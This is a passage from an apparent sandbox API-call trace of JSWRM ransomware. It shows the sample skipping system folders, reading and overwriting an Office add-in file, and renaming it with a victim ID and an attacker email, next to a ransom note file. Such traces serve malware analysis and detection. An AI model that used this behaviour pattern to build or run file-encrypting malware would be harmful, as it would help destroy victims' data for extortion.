(in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0124.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0124.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0124.258] FindNextFileW (in: hFindFile=0x231cc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40b6d79e, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x40b6d79e, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x40b6d79e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0124.258] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0124.258] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0124.258] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0124.258] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0124.258] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0124.258] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0124.258] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0124.258] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0124.258] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0124.258] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0124.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0124.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0124.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2413a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0124.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0124.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0124.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0124.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0124.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0124.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0124.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22af10 | out: hHeap=0x1e0000) returned 1 [0124.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0124.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0124.258] FindNextFileW (in: hFindFile=0x231cc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa911c96, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa911c96, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa937f07, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x13ac8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.PowerBI.Diagnostics.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0124.258] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2=".") returned 1 [0124.258] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="..") returned 1 [0124.258] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="...") returned 1 [0124.258] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="windows") returned -1 [0124.258] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0124.258] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0124.258] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0124.258] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.259] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0124.259] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0124.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0124.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0124.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0124.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0124.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0124.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0124.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0124.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0124.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d298, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0124.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0124.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0124.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0124.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0124.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0124.259] FindNextFileW (in: hFindFile=0x231cc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6164f96, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6164f96, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf618b1a4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x13078, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0124.259] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2=".") returned 1 [0124.259] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="..") returned 1 [0124.259] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="...") returned 1 [0124.259] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="windows") returned -1 [0124.259] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="recovery") returned -1 [0124.259] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="perflogs") returned -1 [0124.259] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="documents and settings") returned 1 [0124.259] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.259] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="system volume information") returned -1 [0124.259] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="msocache") returned -1 [0124.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0124.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0124.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0124.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0124.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0124.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d698, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0124.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ecb8 [0124.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0124.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0124.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0124.260] FindNextFileW (in: hFindFile=0x231cc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x54ef2e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x54ef2e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x575324, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4d20, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0124.260] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2=".") returned 1 [0124.260] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="..") returned 1 [0124.260] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="...") returned 1 [0124.260] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="windows") returned -1 [0124.260] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="recovery") returned -1 [0124.260] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="perflogs") returned -1 [0124.260] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="documents and settings") returned 1 [0124.260] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.260] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="system volume information") returned -1 [0124.260] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="msocache") returned -1 [0124.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0124.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0124.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d728, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0124.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0124.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0124.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d800, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0124.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ede0 [0124.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0124.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0124.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0124.260] FindNextFileW (in: hFindFile=0x231cc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x14648313, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x14648313, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1466e4fb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x50d09, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.hu.xap", cAlternateFileName="POWERV~1.XAP")) returned 1 [0124.260] lstrcmpiW (lpString1="PowerViewRes.hu.xap", lpString2=".") returned 1 [0124.260] lstrcmpiW (lpString1="PowerViewRes.hu.xap", lpString2="..") returned 1 [0124.261] lstrcmpiW (lpString1="PowerViewRes.hu.xap", lpString2="...") returned 1 [0124.261] lstrcmpiW (lpString1="PowerViewRes.hu.xap", lpString2="windows") returned -1 [0124.261] lstrcmpiW (lpString1="PowerViewRes.hu.xap", lpString2="recovery") returned -1 [0124.261] lstrcmpiW (lpString1="PowerViewRes.hu.xap", lpString2="perflogs") returned 1 [0124.261] lstrcmpiW (lpString1="PowerViewRes.hu.xap", lpString2="documents and settings") returned 1 [0124.261] lstrcmpiW (lpString1="PowerViewRes.hu.xap", lpString2="$RECYCLE.BIN") returned 1 [0124.261] lstrcmpiW (lpString1="PowerViewRes.hu.xap", lpString2="system volume information") returned -1 [0124.261] lstrcmpiW (lpString1="PowerViewRes.hu.xap", lpString2="msocache") returned 1 [0124.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0124.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.hu.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0124.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0124.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.hu.xap", cchWideChar=19, lpMultiByteStr=0x240fe8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.hu.xap", lpUsedDefaultChar=0x0) returned 19 [0124.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0124.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0124.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.hu.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0124.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0124.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.hu.xap", cchWideChar=19, lpMultiByteStr=0x2411c8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.hu.xap", lpUsedDefaultChar=0x0) returned 19 [0124.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0124.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0124.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0124.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0124.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0124.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0124.261] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\hu\\PowerViewRes.hu.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\hu\\powerviewres.hu.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0124.264] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=331017) returned 1 [0124.264] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e0 [0124.264] ReadFile (in: hFile=0x338, lpBuffer=0x24f1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0124.278] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.278] WriteFile (in: hFile=0x338, lpBuffer=0x24f1e0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0124.278] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0124.278] CloseHandle (hObject=0x338) returned 1 [0124.278] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dff8 [0124.278] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0124.278] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0124.279] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0124.279] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0124.279] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0124.279] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0124.279] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0124.279] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0124.279] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0124.279] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0124.279] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0124.279] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0124.279] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0124.279] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\hu\\PowerViewRes.hu.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\hu\\powerviewres.hu.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\hu\\PowerViewRes.hu.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\hu\\powerviewres.hu.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0124.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0124.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dff8 | out: hHeap=0x1e0000) returned 1 [0124.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0124.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0124.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0124.280] FindNextFileW (in: hFindFile=0x231cc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x14648313, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x14648313, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1466e4fb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x50d09, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.hu.xap", cAlternateFileName="POWERV~1.XAP")) returned 0 [0124.280] FindClose (in: hFindFile=0x231cc0 | out: hFindFile=0x231cc0) returned 1 [0124.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0124.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: 